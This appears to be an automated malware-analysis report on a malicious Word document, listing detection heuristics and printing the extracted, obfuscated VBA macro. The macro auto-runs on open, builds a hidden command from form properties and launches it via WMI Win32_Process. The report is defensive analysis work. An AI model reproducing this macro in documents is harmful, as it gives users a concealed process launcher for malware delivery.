MALICIOUS
302
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros with an autoopen subroutine, which is a common technique for executing malicious code upon opening the document. The script utilizes GetObject and CreateObject to interact with WMI, specifically launching the Win32_Process to create a new process. The reassembled string 'winmgmts' indicates the use of Windows Management Instrumentation for process creation, likely to download and execute a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Smpowloadbb-6962907-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Smpowloadbb-6962907-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3808 bytes |
SHA-256: 3d640c8c1b157a7346f6c9c16c2149de17913c4d41c8ce1e22469e2d814f60f7 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "R_28208"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "U5791469"
Attribute VB_Base = "0{3CA2FA74-431C-4460-A1D5-D1D8DE9CE819}{8386B03A-BF3E-4151-9768-CA8325B461F8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "p880367"
Attribute VB_Name = "f84731"
Attribute VB_Name = "Z25081"
Attribute VB_Base = "0{807A46D2-975D-4935-A153-ACAD9AEA1154}{7ADB22F7-9441-45E1-97C7-28B77B42509E}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "f079243"
Function F3349426(k5173977)
While J085542 And 149204088
Wend
While w95_74 And 854454346
Wend
Set F3349426 = CVar(k5173977)
While K305310 And 753979421
Wend
While U395853 And 789322616
Wend
While C46_6148 And 119975422
Wend
End Function
Sub _
autoopen()
On Error Resume Next
While E933054 And 634371450
Wend
While D44328 And 747068456
Wend
Call t744954
While o4_0754 And 631610284
Wend
While L84482 And 137818177
Wend
End Sub
Attribute VB_Name = "H9055_"
Function t744954()
On Error Resume Next
While N_3276 And 12000626
Wend
While q2344450 And 52923854
Wend
While t7513_ And 766056641
Wend
G79_4559 = U5791469.L_859172 + Z25081.z23_02 + U5791469.L_859172.ControlSource + Z25081.Q255481 + U5791469.L_859172.ControlSource + U5791469.L_859172.PasswordChar + Z25081.J722502 + U5791469.L_859172 + U5791469.L_859172.ControlTipText + Z25081.z52_3667 + U5791469.L_859172.PasswordChar + Z25081.Y206_0 + U5791469.L_859172.ControlSource
While E761195 And 635100312
Wend
While c9159133 And 558910165
Wend
Set Z791726 = F3349426(GetObject("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess"))
While p1175181 And 437584546
Wend
While F_9659 And 838715886
Wend
Z791726.Create w082615 + G79_4559 + U899993, b1324075, P1_938, z6077_
While M34415 And 362366490
Wend
While t527155 And 103910997
Wend
While j264093 And 454649236
Wend
End Function
Attribute VB_Name = "r33628"
Public Function P1_938()
While k15_0707 And 902055413
Wend
While j943965 And 26656806
Wend
While H059_751 And 372828827
Wend
Set P1_938 = F3349426(GetObject("win" + "mgmt" + "s:Wi" + "n32_Pr" + "ocess" + "S" + "tartup"))
While b__41479 And 622989322
Wend
While X3013_12 And 835013015
Wend
Y1770936 = vbError - vbError
While w60479 And 368350587
Wend
While z199863_ And 702267513
Wend
While Z097229 And 879233403
Wend
With P1_938
While E89865 And 80006309
Wend
While W54965 And 586659777
Wend
. _
ShowWindow = Y1770936 + Y1770936 + Y1770936 + Y1770936 + Y1770936 + Y1770936 + Y1770936
While a8088070 And 308619861
Wend
While Q3131844 And 829662904
Wend
End With
While C_0883 And 491278664
Wend
While Y3920787 And 267610294
Wend
While Y52606 And 77492009
Wend
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.